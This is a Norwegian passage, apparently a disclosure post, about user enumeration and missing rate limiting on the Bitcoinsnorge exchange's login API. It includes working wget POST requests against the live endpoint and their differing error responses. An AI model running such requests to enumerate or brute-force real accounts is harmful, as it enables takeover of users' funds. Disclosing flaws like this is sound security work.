Vil også nevne at systemet lar hvem som helst sjekke hvem som har konto. Når man logger inn får man ulik feilmelding avhengig om e-postadressen er registert eller ikke. Siden det ikke ser ut til å være noen begrensing på hvor mange forsøk man gjøre, kan dette også utnyttes til å gjøre brute force angrep på passord. API-et gjør det trivielt å automatisere et slikt angrep:
wget -qO- --post-data '{"email":"support@bitcoinsnorge.no","password":"abc"}' https://bitcoinsnorway.com:8400/ajax/v1/Login1
{"is2FAAuthyRequired":false,"is2FaGoogleRequired":false,"isAccepted":false,"rejectReason":"Password incorrect."}
wget -qO- --post-data '{"email":"test@example.com","password":"abc"}' https://bitcoinsnorway.com:8400/ajax/v1/Login1
{"is2FAAuthyRequired":false,"is2FaGoogleRequired":false,"isAccepted":false,"rejectReason":"User not found"}
Jeg rapporterte dette direkte til Bitcoinsnorge for ca to måneder siden. Fikk svar at de skulle fikse dette, men ingen ting har skjedd så langt.